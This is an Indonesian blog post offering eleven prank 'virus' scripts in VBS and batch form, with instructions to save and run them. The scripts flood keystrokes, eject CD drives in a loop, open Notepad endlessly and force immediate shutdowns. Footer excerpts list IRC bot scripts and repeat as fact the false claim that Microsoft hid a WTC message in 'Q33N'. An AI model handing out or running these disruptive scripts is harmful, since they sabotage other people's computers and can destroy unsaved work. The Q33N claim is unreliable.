Skip to main content

Iseng buat Virus

1. buka notepad ketik scrip di bawah ini ...save dengan format.bat atau vbs

MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

2. tentang caps lock

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

3. cd rom gila

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

4. keyboard jadi rusak

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop

5. Ngaco

@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya'y ngaco....
msg * Udah install ulang aja.....
msg * Biar masalah nya kelar....
msg * Wkwkwkwkwkkkkkkkk....
GOTO BEGIN

6. notepad

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

7. (bingung beri judul apa)

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"

8. Pesan lambat

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Y"
WScript.Sleep 500
WshShell.SendKeys "O "
WScript.Sleep 500
WshShell.SendKeys ", U"
WScript.Sleep 500
WshShell.SendKeys "D i"
WScript.Sleep 500
WshShell.SendKeys "e "
WScript.Sleep 500
WshShell.SendKeys "HACK"
WScript.Sleep 500
WshShell.SendKeys "B "
WScript.Sleep 500
WshShell.SendKeys "u "
WScript.Sleep 500
WshShell.SendKeys "G "
WScript.Sleep 500
WshShell.SendKeys "!@#$%^&*()_+_)(*&^%$#@#$%^&*()"
WScript.Sleep 500
WshShell.SendKeys " M"
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "S !!! "

9. shutdown

@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"

10. tombol truss

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

11. (perhatian virus ini jangan skali2 d coba)

@echo off
msg * YouDie Tralalala Virus Menyebar !!! @#$%^&*()
shutdown -c "Error! Virus Menyebar Keseluruh System!" -s -t 0

Semua Scrip ini dijalankan dengan format .bat atau .vbs .....virus mainan ini akan tidak berfungsi jika udah d restart.

Comments

Popular posts from this blog

Kumpulan TCLeggdrop

Ni beberapa tcleggdrop yang bisa kalian coba: astro.txt badnick.txt ary.txt away.txt astaga.txt cerewet.txt bulan.txt busuk.txt dns.txt cute.txt flood.txt google.txt hiburan.txt http.txt irclordz2.txt ip.txt irclordz.txt informasi.txt ngoceh.txt portcheck.txt mp3.txt ping.txt mutiara.txt timebomb.txt seen.txt salam.txt scramble.txt slaps.txt whois.txt version.txt   Download tcl  part 2: addsong.tcl antiadvertise.tcl astro.tcl away.tcl ccasbase.tcl cerewet.tcl ceriwis.tcl chanprotect.tcl chanrelay.tcl deopcs.tcl detik.tcl family100 game4in1.tcl gate.tcl http.tcl ident.tcl identify.tcl idlechan.tcl iplocator.tcl jarak.tcl joinflood.tcl jump.tcl kernel.tcl lag.tcl login.tcl lucu.tcl main.tcl milan.tcl mp3.tcl nmap.tcl novirii.tcl optriggers.tcl os.tcl passchecker.tcl passchk.tcl profile.tcl quitban.tcl respon.tcl say.tcl sendmail.tcl services.tcl slap.tcl statistics.tcl stats.tcl target.tcl timebomb.t...

Tutorial Partisi SD Card Tanpa PC di Samsung Galaxy Y

Untuk Androders yang akan mempartisi SDCard, kali ini saya akan mengajarkan carapartisi SD card yang jauh lebih mudah dan simple, karena dilakukan tanpa PC. Jadi partisi SD Card ini bisa dilakukan lewat CWM (ClockWorkMod Recovery). Untuk lebih jelasnya, silakan lakukan taha-tahap tutorial partisi SDCard di bawah ini: Langkah – Langkahnya : Masuk menu CWM Recovery ( matikan Youngi, nyalakan kembali dengan menekan tombol Home + Power bersamaan ) Pilih menu Advanced Pilih Partition SD Card Pilih berapa Mb yg akan di buat partisi untuk Ext Size nya, misalkan SDcard 8Gb = 1024 Mb = 1 Gb, SDcard 4 Gb = 512 Mb, SDcard 2 Gb = 512Mb disini tergantung pada kebutuhan Anda sendiri, walau sebenarnya rata2 1 Gb juga tidak semuanya terpakai, jadi pada intinya tergantung bagaimana om dan tante mensikapinya Pada proses swap = pendukung memory internal HH silahkan diisi atau pun tidak, kalau mau diisi, silakan isi 128 MB Jika sudah selesai proses seluruhnya, biarkanSDcard memformat sendiri...

Tips & Trik Notepad

Pada tulisan-tulisan sebelumnya telah dibahas tentang cara membuat bermacam-macam trik dengan Notepad. Pada tulisan kali ini akan meng-eksplorasi lebih jauh hal-hal menarik yang bisa anda lakukan dengan Notepad seperti trik membuat variasi efek tulisan ala Matrix hingga cara membuat program / script jahil.  Pesan Rahasia Pada Notepad Ingatkah anda pada tragedi WTC yang terjadi pada tahun 2001? Tragedi yang menewaskan lebih dari 3000 jiwa oleh pesawat bunuh diri berkode penerbangan Q33N itu ternyata disimboliskan oleh pembuat Microsoft kedalam sebuah pesan di Notepad/wordpad dsb. Bukalah Notepad anda. (Klik kanan didesktop > New > Text Document ) Kemudian ketikkan Q33N Lalu blok teks tersebut dan klik Format > Font pada bagian menu Lalu ganti ukuran font ke 72 dan pilih jenis font Wingdings Klik Ok dan lihat pesan yang muncul dilayar Membuat Efek Tulisan Matrix Dengan Notepad Bila anda pecinta film fiksi tentunya mengenal film Matrix dengan efe...